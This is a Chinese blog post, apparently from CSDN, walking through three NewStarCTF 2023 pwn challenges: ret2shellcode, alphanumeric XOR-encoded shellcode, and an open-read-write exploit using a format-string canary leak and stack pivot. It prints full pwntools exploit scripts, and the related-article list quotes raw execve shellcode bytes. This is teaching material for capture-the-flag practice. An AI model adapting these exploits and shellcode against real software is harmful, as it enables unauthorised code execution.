PWNshellcode技巧newstar2023三道shellcode题

最新推荐文章于 2024-07-29 18:33:52 发布
最新推荐文章于 2024-07-29 18:33:52 发布
阅读量479 收藏 12
点赞数 11
文章标签: python 学习方法 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74312867/article/details/135883484
版权

week1-ret2shellcode

mmap直接创建一个块出来,可以从该地址直接执行shellcode,用read函数写入shellcode,然后DUMPOUT到块中执行shellcode,告诉我们shellcode要在可以执行的地方执行

 

from pwn import *
context.arch = 'amd64'
p = process("./ezshellcode")

shellcode = asm(shellcraft.sh())
p.sendline(shellcode)

p.interactive()

week2-shellcode revenge

和上一道题不一样的是,这道题不能read后直接DUMPOUT(),而是多了一个if判断,意在让shellcode只输入大写字母和数字,这道题的思路是:

1.利用手写shellcode完成了syscall调用read函数的操作,然后利用read读入不受限制的shellcode,不受限制的shellcode直接利用pwntools生成

2.多利用异或,手写一段只有大写字母和数字的shellcode

这道题还并不是很懂,对shellcode编写还有一些地方不懂,就不过多发表自己的拙见了,以下是官方wp

from pwn import *
context.arch = 'amd64'
p = process('./shellcodere')
#payload = b'4P1BV4P3BJ1BJ1BVSX3BN1BZSX3BR1BZ0B80BB0BH0BIVX4V1BJSX4V30J0BJ484U38JVZPPEOJ29655CPJJ085PPXPP'


payload = b'\x33\x42\x38'  #33 42 38 xor eax, DWORD PTR [rdx+0x38]
payload += b'\x31\x42\x30' #31 42 30 xor DWORD PTR [rdx+0x30], eax
payload += b'\x33\x42\x37' #33 42 38 xor eax, DWORD PTR [rdx+0x38]
payload += b'\x31\x42\x38' #31 42 38 xor DWORD PTR [rdx+0x38], eax
#上面是异或的操作,下面是需要异或的syscall,由于syscall的机器码为"0f 05",而f受限制
#因此用A即0x41异或0x4e,0x44:0x4e^0x41=0xf 0x44^0x41=0x5
payload += b'\x59'*(0x30-len(payload)) #59 pop rcx
payload += b'\x4e\x44'*2   #syscall
payload += b'A'*8
p.sendlineafter("magic\n",payload)
#gdb.attach(p)
pause()
p.sendline(b'\x90'*0x40+asm(shellcraft.sh())) #\x90 也就是nop指令,由于离shellcode还有一段距离,就用nop跳板填充


p.interactive()

调试一下

week3-ezorw

orw也就是用open,read,write打印出flag

题目newstar week3 ezorw

这道题开启了canary保护,同时它的gadgets非常少,不太好利用,结合它给的压缩包里面有lib.so文件,可以猜到它要我们泄露libc,但是由于我刚学习了栈迁移这个套路,这道题也可以用栈迁移来完成。

在用ROPgadget 的过程中,不但知道了它的gadgets非常少,也发现了个pop rbp;ret的gadget,这意味这可以用栈迁移,将rbp迁移到程序开辟好的块0x66660000中,然后在里面写入,执行shellcode。

首先是泄露canary,由于canary最后两位是00,而且在rbp的上面,很快就知道偏移为%11$p

第一次发送泄露canary

p.sendlineafter(b"Try to escape the sandbox\n",b"%11$p")
canary = int(p.recv(18),16)
print(hex(canary))

第二次发送,栈迁移

然后看到这个地方,read函数的第二个参数实际上是rbp-0x30,详见关于栈迁移的文章

此时发送的payload:

注意ret_read的位置

pop_rbp_ret = 0x40121d
ret_read = 0x401382
payload = b'a'*0x28+p64(canary)+b'b'*0x8+p64(pop_rbp_ret)+p64(0x66660100)+p64(ret_read)
p.sendlineafter(b"I think you can get flag now\n",payload)

第三次发送,即到块里面写入shellcode,ret到shellcode的地址直接执行

payload2 = b'a'*0x28+p64(canary)+b'b'*0x8+p64(0x66660110)+asm(payload_orw)
p.sendline(payload2)

 创建一个flag文件,然后打印出来

 

from pwn import *
context(arch='amd64',os='linux')
p = process("./ezorw")

p.sendlineafter(b"Try to escape the sandbox\n",b"%11$p")
canary = int(p.recv(18),16)
print(hex(canary))

pop_rbp_ret = 0x40121d
ret_read = 0x401382
payload = b'a'*0x28+p64(canary)+b'b'*0x8+p64(pop_rbp_ret)+p64(0x66660100)+p64(ret_read)
p.sendlineafter(b"I think you can get flag now\n",payload)

payload_orw = shellcraft.open("flag")
payload_orw += shellcraft.read(3,0x66660000,100)
payload_orw += shellcraft.write(1,0x66660000,100)

payload2 = b'a'*0x28+p64(canary)+b'b'*0x8+p64(0x66660110)+asm(payload_orw)
p.sendline(payload2)

p.interactive()

 

1ip123
关注
  • 11
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PWN-shellcode
MuMuLee_的博客
09-26 1825
构造一段shellcode的作用就是为了在缓冲区溢出时将shellcode的地址覆盖掉正常的返回地址。 目: 1Ch=16+12=28,+esp=32:偏移量是32 能溢出:100-0x1c-4=68字节 C伪代码: 理论基础 函数返回步骤 : 保存返回值:函数返回值保存在EAX寄存器 弹出当前栈帧,恢复上一个栈帧 a) ESP + 当前栈帧大小:堆栈平衡基础上,降低栈顶,回收当前栈帧空间...
pwnshellcode收集
lifanxin的博客
02-25 4768
Write Upshellcode shellcode 这里对pwn中使用到的shellcode做了一个汇总,方便大家参考和使用。 # 32位 短字节shellcode --> 21字节 \x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80 # 32位 纯ascii字符shellcode PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0
二进制学习pwn)-shellcode
liulanghouzi的博客
09-21 1608
帮助二进制安全爱好者入门~
pwn入门——5.shellcode
最新发布
weixin_62626298的博客
07-29 185
本节只会讲解,因为我觉得,对于入门来说,首先要会用,我们用多了,慢慢就会理解它的涵义,大家也可以去自行找相关资料来了解学习
PWN-shellcode-WP- (一)目文件.rar
03-29
为几道搜集的真,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn shellcode 变形shellcode练手目,该目主要是利用三个节点来注入shellcode,考验解人对shellcode的熟悉程度。解:https://blog.csdn.net/A951860555/article/details/110350773
简单的PWN学习-ret2shellcode
weixin_48421613的博客
07-05 871
最近在学习pwn,这是一道2016年的pwn目,主要学习关于栈溢出以及劫持栈指针达到命令执行的效果,笔者水平较差,请轻喷
pwn 手写Shellcode保姆级教程★
YX-hueimie
10-20 3386
本文章为手写Shellcode的教程,本文章将会围绕 NewStarCTF 2023 WEEK2 中的shellcode revenge一展开,深入浅出带你一起编写shellcode。学完本文章,你将会有以下收获:加深对shellcode的理解,提升shellcode的编写能力,提升汇编能力,熟练掌握“异或”操作。
pe_to_shellcode:将PE转换为Shellcode
05-09
pe_to_shellcode 转换PE,以便可以像普通shellcode一样将其注入。 (同时,输出文件仍然是有效的PE)。 同时支持32位和64位PE 作者: 和 客观的 该项目的目标是提供一种生成PE文件的可能性,该文件可以轻松完成...
Custom Shellcode
05-16
Custom Shellcode 代码参考.
shellcode加载器
10-02
Shellcode加载器是一种技术,主要用于在目标系统上执行任意代码,通常用于渗透测试或恶意软件开发。Shellcode是一小段机器码,可以直接被CPU执行,而无需通过解释器或虚拟机。这种加载器的设计旨在绕过安全机制,...
shellcode-resources:关于Shellcode的资源
03-20
Shellcode Shellcode相关资源,150多个工具,500多个文章 目录 -> -> -> -> -> -> -> -> -> -> 开发&&编写 Shellen 工具 [ 706星] [1y] [Py] 相互转换Shellcode开发环境 文章 2018.03 [freebuf] 2018.02 [pediy...
rust-windows-shellcode:Rust中的Windows Shellcode开发
03-05
用Rust编写Windows Shellcode 项目概况 Windows shellcode项目位于shellcode/ ,它可以构建为仅包含.text节的PE文件,并且没有外部依赖项。 然后,我们可以转储.text节并进行一些修补以使其与位置无关。 这个想法...
第二道pwnshellcode
小白垃圾笔记2
03-08 704
rbp:保存的是栈中当前执行函数的基本地址。当前执行函数所有存储在。这里使用了视频说这里用了 call rax所以不能用F5。查看文件类型和保护,虽然现在的我·还没有明白太多的保护。那么如果我们输入shellcode不久获取到了权限了吗。最重要的是最后,call rax,[rbp+buf]栈上的数据都要靠rbp指针加上偏移量来读取。rsp:栈指针,永远指向栈顶。他的意思就是执行输入的内容。64位,放到ida里边。
shellcode基本知识(PWN
weixin_51758733的博客
07-15 911
shellcode基本知识(PWN
PWN入门(6)写入shellcode
Ba1_Ma0的博客
09-20 2030
pwn"这个词的源起以及它被广泛地普遍使用的原因,源自于魔兽争霸某段讯息上设计师打字时拼错而造成的,原先的字词应该是"own"这个字,因为 ‘p’ 与 ‘o’ 在标准英文键盘上的位置是相邻的,PWN 也是一个黑客语法的俚语词,是指攻破设备或者系统。发音类似"砰”,对黑客而言,这就是成功实施黑客攻击的声音,而在ctf比赛里,pwn是对二进制漏洞的利用下载这个github库,进入05文件夹。
PWN知识点整理(1)Shellcode
qq_52469954的博客
10-26 255
0day安全:软件漏洞分析技术(第2版)
PWN初体验之ret2shellcode
weixin_43137410的博客
08-07 698
所有的热爱都应该被坚持,人这一辈子太短了,无论如何都要为自己的热爱拼搏一次,就算最后失败了,至少不会后悔!
LitCTF 2024 pwn AK
YX-hueimie
06-02 1508
探姬姐姐办的比赛,所以就打了一下。尽管是“新生赛”,但pwn方向并不是很新生,5道堆+1道栈,可能是出的师傅比较少吧,应该是只有两位。我了解到这个比赛的时候已经要开赛了,投稿也来不及,要不然就投几道我的得意门生了。
利用图片隐藏Shellcode技巧分析
"这篇资料是关于壳码(Shellcode)隐藏技术的,主要探讨如何将Shellcode藏在图片等不同的文件格式中,以此规避安全检测。由iDefense Labs的研究员Greg MacManus和Michael Sutton共同讲解,内容涵盖了Shellcode的历史...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值